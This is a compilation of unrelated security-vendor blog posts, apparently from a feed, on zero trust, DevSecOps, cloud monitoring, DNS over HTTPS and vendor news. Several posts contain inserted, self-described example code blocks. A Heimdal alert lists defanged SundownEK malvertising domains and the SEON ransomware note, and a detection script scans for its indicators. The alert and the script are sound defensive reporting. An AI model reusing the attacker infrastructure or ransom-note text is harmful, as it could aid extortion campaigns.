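        "wrong-group": decide(Request(alice, healthy, "payroll", "corp-office-lan", now)),
    }


if __name__ == "__main__":
    for name, (allowed, reason) in sample_decisions().items():
        print("%-16s %s (%s)" % (name, "ALLOW" if allowed else "DENY", reason))
```

The stale-inventory case shows the data-quality point from the lessons below: when the infrastructure cannot vouch for a device's current state, the request is denied rather than served on old data.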

What lessons did we learn?

Given this was uncharted territory at the time, we had to learn quickly and adapt when we encountered surprises. Here are some key lessons we learned.

Obtain executive support early on and keep it

Moving to BeyondCorp is not a quick, painless exercise. It took us several years just to get most of the basics in place, and to this day we are still continuing to improve and refine our implementation. Before embarking on this journey to implement BeyondCorp, we got buy in from leadership very early in the project. With a mandate, you can ask for support from lots of different groups along the way.

We make a point to re-validate this buy-in on an ongoing basis, ensuring that the business still understands and values this important shift.

Recognize data quality challenges from the very beginning

Access decisions depend on the quality of your input data. More specifically, they depend on trust analysis, which requires a combination of employee and device data.

If this data is unreliable, the result will be incorrect access decisions, suboptimal user experiences and, in the worst case, an increase in system vulnerability, so the stakes are definitely high.
We put in a lot of work to make sure our data is clean and reliable before making any impactful changes, and we have both workflows and technical measures in place to ensure data quality remains high going forward.

Enable painless migration and usage

The migration should be a zero-touch or invisible experience for your employees, making it easy for them to continue working without interruptions or added steps. If you make it difficult for your employees to migrate or maintain productivity, they might feel frustrated by the process. Complex environments are difficult to fully migrate with initial solutions, so be prepared to review, grant and manage exceptions at least in the early stages. With this in mind, start small, migrate a small number of resources, apps, users and devices, and only increase coverage after confirming the solution is reliable.

Assign employee and helpdesk advocates

We also had employee and helpdesk advocates on the team who represented the user experience from those perspectives. This helped us architect our implementation in a way that avoided putting excess burden on employees or technical support staff.

Clear employee communications

Communicating clearly with employees so that they know what is happening is very important. We sent our employees, partners, and company leaders regular communications whenever we made important changes, ensuring motivations were well understood and there was a window for feedback and iteration prior to enforcement changes.

Run highly reliable systems

Since every request goes through the core BeyondCorp infrastructure, we needed a global, highly reliable and resilient set of services. If these services are degraded, employee productivity suffers.

We used Site Reliability Engineering (SRE) principles to run our BeyondCorp services.

Next time

In the next post in this series, we will go deeper into when you should trust a device, what data you should use to determine whether or not a device should be trusted, and what we have learned by going through that process.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

This post was updated on July 3 to include Justin McWilliams as an author.

Top 3 Challenges with Securing the Cloud

By 2020, it's predicted that 83% of company workloads will be stored in the cloud (Forbes). This rise in usage and popularity comes as no surprise given how cost-effective and easy it is to manage systems in the cloud.

As more critical applications are migrating towards the cloud, data privacy and software security are becoming a greater concern.  With 60% of web applications compromised due to cloud-based email servers (Verizon 2019 DBIR), it’s time to take these concerns seriously.

The cloud has had its share of attacks over the years, from DDoS to data loss attacks and even data breaches.  Whether malicious tampering or accidental deleting, these attacks can lead to a loss of sensitive data and often a loss of revenue.

How exactly do we secure data and prevent against these attacks in the cloud?

The one way to truly secure your data in the cloud is through continual monitoring of your cloud systems. However, this is a challenging process for several reasons:

1. Lack of Visibility

Cloud technology solutions often make the job of security providers more difficult because they don’t provide a single-pane-of-glass to view all endpoints and data. For this reason, you need a vast number of tools to monitor your cloud systems. For example, most cloud solutions send email notifications that provide some visibility into your environment.  However, these notifications don’t always provide enough insight into what exactly happened. You may receive an email alert about a suspicious login, but many of these alerts don’t give information about where the login attempt happened and what user was affected.

These vague alerts mean you have to investigate further; however, many of these cloud systems don’t have very useful investigative tools. If you want to find out more about the alert, you may be able to view the reports and read the logs associated with the activity, but that requires practice in knowing what to look for and how to interpret the information. This leads to another challenge in cloud security: lack of expertise.

2. Lack of Expertise

It takes practice to be able to look at security logs and interpret what the activity means. Different cloud providers may produce different types of logs and it can be difficult to translate the many varying log types.

If you want to secure your cloud environment properly, you will need a team dedicated to configuring, monitoring and managing these tools. Through 2022, it's predicted that 95% of cloud security failures will result from customer error (Gartner). This reinforces the need to configure your cloud environment properly. Interpreting logs and configuring cloud systems requires skills that are developed over time. Many security professionals lack this particular expertise or the time required to properly develop these skills.

Those that do possess these skills and knowledge are in high demand, and there simply aren’t enough people to fill these positions.

3. Lack of Resources

Implementing all the right tools and staffing appropriately to monitor these tools around-the-clock is not an inexpensive endeavor.  Luckily, there are services you can leverage to augment your staff and monitor your environment, such as a managed security services provider (MSSP).

MSSPs have the tools and resources to pull information from all of your different cloud systems and monitor them in one place.  With a full staff of experts on-hand at all hours, an MSSP is fully prepared to monitor and respond to incidents. They can help provide the expertise and visibility into your cloud environment required to properly secure your cloud systems.

The post Top 3 Challenges with Securing the Cloud appeared first on GRA Quantum.

Get Ready for Hot Dogs & Hacking!

We love feedback! Luckily, the security community errs on the side of collaboration, resulting in constructive, helpful feedback whenever it is requested - and often even when it’s not. From a company perspective this is great since we know exactly what our customers are thinking at most times. From a Cyber Range product perspective it's OUTSTANDING - the ideas for updates, new challenges, areas to explore and events to host has left us with a backlog full of gems to choose from at any time. In other words, our product team is living in a dream world full of great ideas!

Live from AWS re:Inforce: Learnings from Security Enablement for DevOps at AT&T


This week, AWS ran its inaugural security conference AWS re:Inforce in Boston. There were several interesting talks at the conference, and I found John Maski’s presentation, “Integrating AppSec in your DevSecOps on AWS,” contained great practical advice. Maski worked for AT&T for 32 years, with his most current role being Director, Production Resiliency & DevSecOps Enablement. He recently joined Veracode to advise customers on how to best integrate Veracode into their security pipeline, and we’re lucky to have him on the team.

Support from Executive Leadership is Crucial

Starting out, and as expected for any large organization, Maski found a huge variety of skill levels and a lot of variation in how people ran their development pipelines outside of the central DevOps initiative.  Software development was optimized for speed – aka “quantity” – and security was an afterthought. 

On the upside, Maski saw pockets of advanced knowledge and CI/CD implementations. A significant CI/CD platform was already in the works. Most importantly, there was a huge appetite among executives for making quick and extensive progress.

“In an organization the size of AT&T, you can’t make meaningful progress without the support of executive leadership,” Maski said. “It is absolutely critical to drive the necessary cultural changes.”

With this backing, he set out to connect with partner organizations, working collectively towards the seemingly impossible goal to secure AT&T’s entire application landscape. Spoiler alert: When Maski recently left AT&T, they were very close to completing this goal.

Integrating Security into the CI/CD Pipeline

If you are coming from the security side of the house and are in charge of application security, it really pays off to truly understand your organization’s development tools and how pipelines are set up. Not only will you be able to speak your engineering team’s language, you will be better suited to advise them on how to integrate security testing solutions.

Most of application security can and should be automated, with the exception of what’s at the very beginning and the very end of the process. Threat modeling is still a manual process that relies on human understanding of the architecture, even if there are tools that help visualize and document this process. Likewise, penetration testing is a final litmus test at the end of the development process that should be carried out on any critical application before it is deployed into production.

In the middle are various automated testing solutions that should be run automatically to regularly provide feedback on security defects. Static analysis tests the application code for a broad range of security flaws, and it can be fully automated into both the IDE and the CI process. In the IDE, it provides early security guidance and education to software engineers while they are coding by highlighting potential vulnerabilities and suggesting best practices. Veracode has found that integrating SAST in this early stage in the process has helped organizations to reduce newly introduced flaws by 60 percent.

However, guidance at this stage is not mandatory and is mostly suitable to removing flaws in newly written code. To ensure a more structured feedback and compliance process, static analysis should be integrated into the SDLC. Typically, development teams would scan as part of their CI process, either on a code commit or a pull request, and get security defects flagged through the ticketing system. They will do this scan in a “sandbox,” so that results do not get escalated to the security team. Finally, for high security applications, we recommend doing a scan on the full scope of the application before each deployment to ensure that no security defects escape to production.

Software composition analysis looks at known vulnerabilities in open source libraries that are being used in the code. If you find such a vulnerability, the fix is usually upgrading to a different library version rather than fixing the open source code yourself. SCA often integrates with the SDLC in the same places as static analysis.

Dynamic analysis is a third way of looking for vulnerabilities in software and is typically applied to web applications. Unlike static analysis, which looks at the application code, dynamic analysis interacts with the application via an instrumented browser that crawls and audits the application. While findings with other testing solutions overlap, there are several security issues that only dynamic analysis can detect, including server configuration errors. Dynamic analysis is typically run in the QA stage against a staging server and against the production server.
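The two SAST/SCA integration points described above (a sandbox scan on a pull request that files tickets but never blocks, and a full-scope scan before deployment that fails the pipeline while open defects remain), as an added example that is not Veracode's or AT&T's code. The findings format, CWE labels, library names and severity threshold are constructed.

```python
"""Pipeline gates for static analysis (SAST) and software composition analysis (SCA).

Added example, not Veracode's or AT&T's code: it models the two integration
points described in the text. A sandbox scan on a pull request records tickets
for newly introduced flaws but never blocks; a full scan before deployment
fails the pipeline while open findings at or above a severity threshold remain.
The findings format, library names and severities are constructed.
"""

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}

# Constructed scanner output (not any real tool's format)
SAMPLE_FINDINGS = [
    {"kind": "sast", "cwe": "CWE-89", "severity": "high",
     "file": "app/db.py", "line": 42, "new": True},
    {"kind": "sast", "cwe": "CWE-79", "severity": "medium",
     "file": "app/views.py", "line": 17, "new": False},
    {"kind": "sca", "library": "example-lib", "version": "1.2.0",
     "fix_version": "1.2.5", "severity": "high", "new": True},
    {"kind": "sca", "library": "other-lib", "version": "0.9",
     "fix_version": None, "severity": "low", "new": False},
]


def remediation(finding):
    """Suggested fix: upgrade the library for SCA, fix the code for SAST."""
    if finding["kind"] == "sca":
        if finding["fix_version"]:
            return "upgrade %s %s -> %s" % (
                finding["library"], finding["version"], finding["fix_version"])
        return "no fixed release for %s; assess exposure" % finding["library"]
    return "fix %s at %s:%s" % (finding["cwe"], finding["file"], finding["line"])


def pr_sandbox_gate(findings):
    """Sandbox scan on a pull request: ticket new flaws, never fail the build."""
    tickets = [
        {"severity": f["severity"], "action": remediation(f)}
        for f in findings if f["new"]
    ]
    return {"block": False, "tickets": tickets}


def pre_deploy_gate(findings, min_severity="medium"):
    """Full-scope scan before deployment: block on any open finding at or above threshold."""
    threshold = SEVERITY_RANK[min_severity]
    blocking = [remediation(f) for f in findings
                if SEVERITY_RANK[f["severity"]] >= threshold]
    return {"block": bool(blocking), "blocking": blocking}


if __name__ == "__main__":
    print("PR sandbox:", pr_sandbox_gate(SAMPLE_FINDINGS))
    print("Pre-deploy:", pre_deploy_gate(SAMPLE_FINDINGS))
```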

Five Tips for Getting Traction with Your DevSecOps Initiative

With many lessons learned during his DevSecOps initiative at AT&T, Maski shared his five recommendations for getting traction with your own program:

  1. Partner with stakeholders: Identify, collaborate, and align with your partners, especially in software development. You have to understand their world and respect their point of view for your program to be successful.
  2. Pick the right metrics: Know your metrics before you jumpstart the program. Talk upfront with your sponsors and partners on what success means to them and agree on metrics.
  3. Don’t boil the ocean: Go “Agile.” Pick pilot applications to secure, so that you can learn from the process and expand to the next group of applications. Keep note of what you learn along the way to improve the program over time.
  4. Run an internal campaign: Communicate effectively to raise awareness about the importance of AppSec to the business. Tie AppSec to the mission of the company. Use your communication to educate DevOps team members about AppSec to help strengthen their expertise.
  5. Demonstrate progress: To ensure continued executive support for your program, regularly report your program’s progress through the metrics you picked. Tailor your progress reports to the audience; for example, your senior leadership will want to see different metrics than your engineering partners.

Key Learnings from AT&T’s DevSecOps Program

Maski left the audience with three key learnings from running his program:

  • Strong Executive Leadership is key to driving the necessary cultural changes – and to secure the required budget.
  • If getting your program started quickly is a requirement, use services built on a robust platform. That way you can focus on onboarding applications rather than building and maintaining scanning infrastructure.
  • Build a strong team and have a flexible plan. Map out and communicate your plan with confidence. That doesn’t mean that your plan has to be perfect – learn and adjust as you go along. Set bold goals to drive progress.

Veracode was and is a cornerstone of AT&T’s AppSec strategy. If you’d like to learn how to build an AppSec program in your organization, download The Ultimate Guide to Getting Started With Application Security.

Key benefits of Seqrite Secure Web Gateway

Estimated reading time: 2 minutes

Enterprises are recently waking up to the usefulness of having layered protection for their networks. This involves investing in various layers of protection such as anti-virus, anti-malware, anti-spyware and a firewall. However, firewalls while providing protection can often fall short when compared to the sheer pace with which cyber criminals adapt and create new threats. This is where secure web gateways can help boost cybersecurity – by acting as a gateway between the Internet and the network, secure web gateways can prevent unsecured traffic from entering an organization’s internal network and prevent employees from accessing or being infected by malicious traffic.

Seqrite’s Secure Web Gateway (SWG) solution provides advanced traffic filtering, an intuitive solution that removes unwanted software/malware from user-initiated Web/Internet traffic and enforces corporate and regulatory policy compliance. SWG offers policy-controlled solutions that transform the web from a risky to a secure environment tailored exactly to the organization’s needs.

The benefits of SWG

SWG defends users from Internet-borne threats such as unwanted software/malware. It helps enterprises enforce corporate and regulatory policy compliance. It is integrated with Quick Heal’s renowned scan engine and URL categorization service, backed by a cloud-based, dynamic real-time categorization offering emerging protection against web threats. Architected on the powerful machine learning engine, the URL filtering feature offers best-in-class identification and prevention of known & unknown threats with high accuracy. Seqrite’s unparalleled expertise in cyber threat intelligence is trusted by millions of users and equips Seqrite SWG to offer the most comprehensive protection.

A few key benefits of Seqrite Secure Web Gateway are:

Security – SWG integrates some of Seqrite’s industry-leading cybersecurity solutions into one comprehensive platform. With advanced URL filtering, anti-virus, anti-phishing measures, anti-malware measures, SWG offers unparalleled protection to enterprises.

Performance – Enterprises often consider the kind of performance impact a cybersecurity solution will have. Powerful solutions may have an impact on performance, but SWG offers a convenient solution – the highest protection with a minimal performance impact.

Usability – SWG is designed to be simple and easy to use so that security administrators spend less time setting it up and more time keeping their enterprises safe. Pre-defined templates are offered for setting up various corporate policies, along with the flexibility to customize policies, ensuring enterprises can adapt it to their own specific needs.

Scalability – This is a solution which can be used regardless of the size of an enterprise. The biggest and the smallest of organizations can safely go for SWG, since multiple instances of Seqrite SWG can co-exist on the same server without any inter-dependence, making it highly scalable.

Thanks to product highlights like User/Application/Content-based granular policies, SSL inspection, URL filtering, high-speed in-memory virus detection, application control, Data Loss Prevention (DLP) and easy integration with Microsoft AD/OpenLDAP, Seqrite Secure Web Gateway (SWG) offers the kind of advanced protection that today’s enterprises can be confident about using to secure their enterprise and achieve their cybersecurity goals.

The post Key benefits of Seqrite Secure Web Gateway appeared first on Seqrite Blog.

Security Alert: Malvertising campaign using SundownEK drops SEON ransomware

The advertising systems of several popular websites have been compromised by an injection of a malicious script that redirects random visitors to a SundownEK gateway.

Then, non-updated systems are prone to ransomware infections.

The respective injection redirects the traffic via the following chain (sanitized by CSIS):

fastimage[.]site

–> adsfast[.]site

–> accomplishedsettings.cdn-cloud[.]club

The latter acts as SundownEK payload delivery and it is by no means the only subdomain that uses this FQDN for this kind of activity (sanitized by CSIS):


The domain (sanitized by CSIS) mtproto[.]world could be activated in case the domain previously mentioned is disabled.

SundownEK will try to exploit vulnerabilities in Adobe Flash Player and Internet Explorer.

If the machine has not been properly updated, a binary payload will be delivered. This will run a ransomware of the SEON class, namely version 0.2 of this malicious ransomware.

Not only that, but a slightly modified version of data stealer Pony will also be dropped.

This SEON variant adds the file extension .FIXT to all data files, both locally and on all available network drives.

Criminals request that the victims contact them via several email addresses listed in the SEON ransomware message.

All folders that have had data encrypted by SEON ransomware contain a text file with the following note:

    SEON RANSOMWARE ver 0.2

    all your files has been encrypted

    there is only way to get your files back: contact with us, get decryptor software and pay

    We accept Bitcoin and other cryptocurrencies

    You can decrypt 1 file for free

    Our contact emails:

    [removed by CSIS]-
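The two host-side indicators the alert describes (files renamed with the .FIXT extension, and a ransom note dropped in every affected folder) as an added triage script; this is example code, not Heimdal's or CSIS's tooling. The alert does not name the note file, so every small file is checked for the note's first line; the note file names and the sample directory tree are constructed.

```python
"""Host-side triage for the SEON indicators described in the alert.

Added example, not Heimdal's or CSIS's code: it walks a directory tree and
flags files carrying the .FIXT extension this SEON variant appends, and small
files that begin with the ransom note header. The alert does not name the
note file, so every small file is inspected for the header. The sample tree
(including the note file name) is constructed in a temporary directory.
"""
import os
import tempfile

RANSOM_EXT = ".fixt"                         # compared case-insensitively
NOTE_HEADER = b"SEON RANSOMWARE ver 0.2"     # first line of the note quoted in the alert
MAX_NOTE_BYTES = 4096                        # notes are tiny; skip larger files


def scan_tree(root):
    """Return relative paths of suspected encrypted files and notes, plus hit folders."""
    encrypted, notes, folders = [], [], set()
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower().endswith(RANSOM_EXT):
                encrypted.append(rel)
                folders.add(os.path.dirname(rel))
                continue
            try:
                if os.path.getsize(path) > MAX_NOTE_BYTES:
                    continue
                with open(path, "rb") as fh:
                    head = fh.read(MAX_NOTE_BYTES)
            except OSError:
                continue  # unreadable file; not an indicator by itself
            if head.lstrip().startswith(NOTE_HEADER):
                notes.append(rel)
                folders.add(os.path.dirname(rel))
    return {"encrypted": sorted(encrypted), "notes": sorted(notes),
            "folders": sorted(folders)}


def verdict(result):
    """Both indicators together are a strong signal; either alone still warrants triage."""
    if result["encrypted"] and result["notes"]:
        return "seon-indicators-confirmed"
    if result["encrypted"] or result["notes"]:
        return "suspicious"
    return "clean"


def build_sample_tree(root):
    """Constructed victim-like tree: two hit folders and one clean folder."""
    note = (b"SEON RANSOMWARE ver 0.2\n    all your files has been encrypted\n"
            b"    Our contact emails:\n    [removed]\n")
    layout = {                                # file names are constructed
        "docs/report.docx.FIXT": b"\x00\x11garbage",
        "docs/note.txt": note,
        "photos/holiday.jpg.fixt": b"\xff\xd8junk",
        "photos/note.txt": note,
        "clean/readme.txt": b"nothing to see here\n",
        "clean/data.csv": b"a,b,c\n1,2,3\n",
    }
    for rel, data in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def run_demo():
    """Build the sample tree in a temp dir, scan it and return the result."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        result = scan_tree(root)
    result["verdict"] = verdict(result)
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-10s %s" % (key, value))
```

Point scan_tree at a mounted share or user profile to list which folders were touched; the alert notes that network drives are encrypted too, so the share side should be checked separately from the endpoint.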

Heimdal blocks the related domains, so all Thor Home and Thor Enterprise users are safe.

The security guide you need to follow so you don’t risk losing your data

There is no guarantee that a key for the SEON Ransomware will be provided by this group in exchange for money.

And even if the malicious group actually provided a key that decrypts your files, you should not be paying them. By offering them money, you are encouraging this type of criminal online behavior.

As per our knowledge, currently, there is no free decryption tool available for SEON.

So, here are the steps you need to follow to stay protected against the SEON ransomware (and other ransomware strains in general):

#1. Make sure you always apply updates to your system, software, and apps.

In this specific case, check if you are running the latest version of Adobe Flash Player and IE. Or use a solution that closes security holes in your software through automatic patching, like Thor Free.

#2. Always back up your files.

If you have a copy of your files stored somewhere, either on an external hard drive or in the Cloud, the ransomware attack wouldn’t mean that much to you. Well, of course, you would have to start out with a fresh PC installation, but at least you still have access to your backed-up important documents.

This guide will show you how to back up your files.

#3. Have a good security solution running on your PC.

Use a proactive, anti-malware solution that detects threats before they happen. Malware is specially developed to bypass your traditional antivirus, but if you add additional security layers, you can rest assured you are safe.

For example, Thor Foresight Home always protects you against ransomware attacks, because it filters your Internet traffic and blocks ransomware distribution sources. Also, it automatically updates your apps, so you don’t have to worry about it. And it works great alongside any other antivirus software.


#4. DO NOT pay the ransom.

I’ve said this before and I’ll say it again: whatever you do, just don’t pay the ransom!

*This article features cyber intelligence provided by CSIS Security Group researchers. 


The post Security Alert: Malvertising campaign using SundownEK drops SEON ransomware appeared first on Heimdal Security Blog.

Smashing Security #134: Sextortion, silicone face masks, and a DDoS doofus

Scammers steal millions by impersonating a French politician, we offer fashion tips for DDoS attackers, and hear how a small town fought a sextortionist preying on young women.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Jessica Barker.

Klaytn Will Onboard Cloudbric Following Mainnet Launch

The internet giant KakaoTalk has just launched its blockchain platform on June 27, 2019. The mainnet launch was orchestrated by KakaoTalk’s blockchain arm, Ground X.

This marks a big occasion for both Klaytn and Cloudbric, who is a technology ISP (Initial Service Partner).  

Klaytn has emphasized the importance of ISPs who provide substantial and tangible service use cases for the blockchain ecosystem. Because the company’s main focus is on the Dapps (decentralized apps) that run on the blockchain, Cloudbric will launch a crypto security app within Q3.

The app will focus on protecting users when they use crypto apps or exchanges to transfer cryptocurrency. 

After its initial release, Cloudbric has plans to add upgraded features and functions.

Please look forward to more details soon as we disrupt the crypto security market!

—-

Cloudbric is already working to provide web security services to numerous cryptocurrency exchanges and blockchain projects. Known for our distinguished WAF, Cloudbric also recently released Threat DB, our free database of threat intelligence, this past May. The platform currently includes blacklisted (malicious) IPs, known hacker wallet addresses, and phishing URLs.

The data collected on the platform will be available via an API which allows businesses and developers to create their own security technologies. 

Crypto exchanges can also leverage the hacker wallet addresses to prevent unauthorized transactions on their platform.


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Klaytn Will Onboard Cloudbric Following Mainnet Launch appeared first on Cloudbric.

How to verify and claim your CLBK token bonuses

Hello Cloudbric CLB community,

The following guide is meant to help you claim your additional CLBK bonuses that you acquired during our Super Holders Event.

Klaytn’s wallet app is expected to be released in late August/early September following the launch of Klaytn’s main net (opened June 27) and will be available to all users. The Klaytn Wallet allows you to check the balance of KLAY and KLAY compatible tokens like CLBK.

Thus, prior to the wallet’s release, Cloudbric will distribute CLBK through Cloudbric Labs, our online hub of free web security resources and tools for the cybersecurity community, in time for our upcoming token swap with Klaytn.


Step 1: Sign up for membership on Cloudbric Labs using the same email you used to participate in the Super Holder Event

Check for your email here.

Step 2: Go to your dashboard and check the quantity of your CLBK tokens. 

Those who participated in the event using multiple wallet addresses but used the same email will be able to see their accumulated CLBK. 

Dashboard

Step 3: Following the release of Klaytn’s wallet, you will be able to enter a Klaytn wallet address into Cloudbric Labs’ withdrawal feature to claim your CLBK.

More details about the token swap will soon be announced!


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post How to verify and claim your CLBK token bonuses appeared first on Cloudbric.

Three Network Security Questions with CEITEC’s CIO

Ireneo Demanarig is the Chief Information Officer at CEITEC S.A. located in Porto Alegre, Rio Grande do Sul, Brazil. CEITEC is a microelectronics manufacturer that specializes in solutions such as automatic identification (RFID and smartcards), application-specific integrated circuits (ASICs) aimed at identifying animals, and much more.

Recently, I jumped on the phone with Ireneo and asked him three questions about his deployment of Trend Micro Network Defense products. And here is what he had to say.

Can you briefly describe your network protection?

We are using a Palo Alto Networks Next Gen Firewall and an F5 DNS at the perimeter with a TippingPoint IPS sitting in-line behind both of them. Off our core switch we are running Deep Discovery Inspector to protect us from advanced threats. Some people consider using a Next Gen Firewall along with an IPS redundant, but that is not the case. They both protect my network in different ways. The firewall protects my applications while my IPS helps keep the threats at bay. A great example was WannaCry. My next gen firewall missed it but my IPS was able to block every attempt. I also know that if threats get past both of them I can rely on Deep Discovery Inspector to detect the threat as it moves in, out or across my network.

Toward the end of 2018 Trend Micro released the Deep Discovery Network Analytics add-on module, which correlates Deep Discovery Inspector events and displays the entire attack lifecycle graphically for quicker response to threats. CEITEC was one of the first customers to do a proof of concept on the new module.

When you did the proof of concept with Deep Discovery Network Analytics what were you able to see?

The proof of concept was a real eye opener for us. Deep Discovery Inspector generates a lot of events and we have a limited staff. So we can only focus on the highest level detections. We don’t have time to look at all events, much less try to connect the dots between multiple events. The Deep Discovery Network Analytics showed us a number of detected attacks that were buried in the events. Specifically, it found a coin miner that had been hiding in our network. Network Analytics showed us all the users that were being used in this attack and where they were calling out to. Correlating all this info would have taken my team 3-4 months.

After purchasing Deep Discovery Network Analytics how long did it take to start seeing the value?

It was immediate. We looked at our correlated events in the management console and could see quickly that we had a major breach impacting a large number of our users and servers. Network Analytics showed us on a single chart where the breach started, how it spread, and all the users impacted. With one click of a mouse we were able to see hundreds of Deep Discovery Inspector events pulled into a single graph. This helped us understand not only the threat, but also how to respond appropriately to the attack.

Find out why CEITEC relies on Trend Micro to not only protect its network but also provide visibility and automation.

See the customer use case.

For more information on Deep Discovery Network Analytics, check out the data sheet or watch the video.

The post Three Network Security Questions with CEITEC’s CIO appeared first on .

Google Public DNS over HTTPS (DoH) supports RFC 8484 standard



Ever since we launched Google Public DNS in 2009, our priority has been the security of DNS resolution. In 2016, we launched a unique and innovative experimental service -- DNS over HTTPS, now known as DoH. Today we are announcing general availability for our standard DoH service. Now our users can resolve DNS using DoH at the dns.google domain with the same anycast addresses (like 8.8.8.8) as regular DNS service, with lower latency from our edge PoPs throughout the world.

General availability of DoH includes full RFC 8484 support at a new URL path, and continued support for the JSON API launched in 2016. The new endpoints are:

  • https://dns.google/dns-query (RFC 8484 – GET and POST)
  • https://dns.google/resolve (JSON API – GET)
We are deprecating internet-draft DoH support on the /experimental URL path and DoH service from dns.google.com, and will turn down support for them in a few months.

With Google Public DNS, we’re committed to providing fast, private, and secure DNS resolution through both DoH and DNS over TLS (DoT). We plan to support the JSON API until there is a comparable standard for webapp-friendly DoH.


What the new DoH service means for developers

To use our DoH service, developers should configure their applications to use the new DoH endpoints and properly handle HTTP 4xx error and 3xx redirection status codes.
  • Applications should use dns.google instead of dns.google.com. Applications can query dns.google at well-known Google Public DNS addresses, without needing an extra DNS lookup.
  • Developers using the older /experimental internet-draft DoH API need to switch to the new /dns-query URL path and confirm full RFC 8484 compliance. The older API accepts queries using features from early drafts of the DoH standard that are rejected by the new API.
  • Developers using the JSON API can use two new GET parameters that can be used for DNS/DoH proxies or DNSSEC-aware applications.

Redirection of /experimental and dns.google.com

The /experimental API will be turned down in 30 days and HTTP requests for it will get an HTTP redirect to an equivalent https://dns.google/dns-query URI. Developers should make sure DoH applications handle HTTP redirects by retrying at the URI specified in the Location header.

Turning down the dns.google.com domain will take place in three stages.
  1. The first stage (in 45 days) will update the dns.google.com domain name to return 8.8.8.8 and other Google Public DNS anycast addresses, but continue to return DNS responses to queries sent to former addresses of dns.google.com. This will provide a transparent transition for most clients.
  2. The second stage (in 90 days) will return HTTP redirects to dns.google for queries sent to former addresses of dns.google.com.
  3. The final stage (in 12 months) will send HTTP redirects to dns.google for any queries sent to the anycast addresses using the dns.google.com domain.
We will post timelines for redirections on the public‑dns‑announce forum and on the DoH migration page. You can find further technical details in our DoH documentation, and if you have a question or problem with our DoH service, you can create an issue on our tracker or ask on our discussion group. As always, please provide as much information as possible to help us investigate the problem!

How McAfee’s Paternity Leave Helped My New Family

By: Guillaume, EMEA Retail Marketing Manager, Slough, U.K.

Becoming a parent is a daunting experience for anyone. The sheer amount of responsibilities can feel overwhelming and all consuming. For my husband and I, we spent an emotional and tiring 18 months working through the adoption process before becoming parents to two fully formed little humans seemingly overnight. Most parents get to know their children over a few years; we only had two weeks’ worth of introduction. In an instant, these two children and their care, happiness, security, dreams and hopes now rest firmly with us.

I feel incredibly grateful to work for a company that understands the value of family. Whether it was my colleagues checking in and celebrating our new arrivals, or the eight weeks of bonding leave that McAfee offers any new parent – including adoptive and same-sex couples. The paternity leave from McAfee really made a difference in getting to know our children and for them to get to know us. I can’t fathom how different the experience and early months would have been if I had to go back to work after two weeks. The extra time allowed us to get settled and establish good routines.

Overcoming Obstacles

That’s not to say the adoption process was easy. My husband and I knew we wanted to adopt in 2014 but didn’t officially start the process until 2017. After a grueling amount of paperwork came the emotional and time-consuming interview with the social worker. The questions challenged me and forced me to confront some of my own anxieties to ready myself for parenthood. We learned how important it is to be ready and open to re-shape who you are to bring forward the best version of yourself for your children.

And as a natural worrier, you can imagine how after having children, my anxieties skyrocketed — in addition to the concerns of any new parent, we have to think about protecting our children from homophobic attacks and prejudices. Our boys already had a tough start; I don’t want to make it tougher.

As an LGBTQ+ family, we get unspoken scrutiny from the world that already puts more pressure on us than on conventional families. We know how society says an LGBTQ+ family should celebrate Mother’s Day or Father’s Day. We notice the side looks from other parents. We know how we must conduct ourselves in public to be safe. We know we can’t go on holiday in certain countries.

As a gay man, I’ve had to work hard to create the family I have today. Growing up, gay marriage and adoption weren’t allowed, so I had come to terms with possibly never having a family of my own. Now, I’m able to play football in the park with my kids, tuck them into bed, or help with their homework – just like any other parent. This makes me feel that together, we can make a difference. We can advance equality and make the impossible, possible.

Feeling Included and Supported

I’ve worked for a number of technology companies, but McAfee is the first one that I can say, hand on heart, delivers on its commitment to inclusion. Upon my return, my colleagues have been great at giving me advice and asking how I’m doing. As an employee and a new father, I couldn’t feel more supported. It’s reassuring to have your company’s backing and I feel lucky to live in an era and country where I could get married and adopt children without discrimination or prejudice.

Allies Can Make a Difference

For me, it’s often the little things that make a big difference toward inclusion and acceptance. Three things I always encourage from allies to help us in our quest for equality, include:

  • Treat people with respect and as your equal (the golden rule – it’s simple and effective!)
  • Have an open mind and don’t be afraid of our differences – we have more in common than you think
  • Call out offensive or disrespectful talk – a simple “hey, that’s not cool” shows those ‘off the cuff’ comments aren’t tolerated

My family is no less different from any other. The worries and hopes for my children are the same as any parent. My struggles and questioning are the same as any father. And the love I feel for my children is the same as everybody else.

Interested in joining our team? We’re hiring! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post How McAfee’s Paternity Leave Helped My New Family appeared first on McAfee Blogs.

New Software Security Framework Programs: Timeline & Key Milestones



PCI SSC has announced the rollout of the Secure Software Lifecycle (Secure SLC) and Secure Software Programs. These new validation programs are intended for use by payment software vendors to demonstrate that both their development practices and their payment software products address overall software security resiliency to protect payment data.

Email technology and its security in nutshell

Estimated reading time: 5 minutes

Email has become a necessity of day-to-day communication. We can appreciate the importance of email from the fact that downtime of an organization’s email server directly affects the organization’s productivity. Email has become the most prominent and integral part of the network system, hence one must know how to manage it and keep it secure. Let’s understand the email technology and its basic flow in a nutshell.

1.1 How email works

(Figure 1.1: Diagram illustrating the basic email flow)

The MUA, also referred to as an email client, is a computer application that allows you to compose and send emails or fetch and read emails intended for you. The MUA can be a web-based client, which means that you send and receive emails via a browser (e.g. Gmail or Yahoo in Firefox, Chrome etc.), or it can be an application-based client (e.g. Thunderbird, Outlook etc.). To send an email, the sender composes the message, adds the recipient, and clicks the Send button.

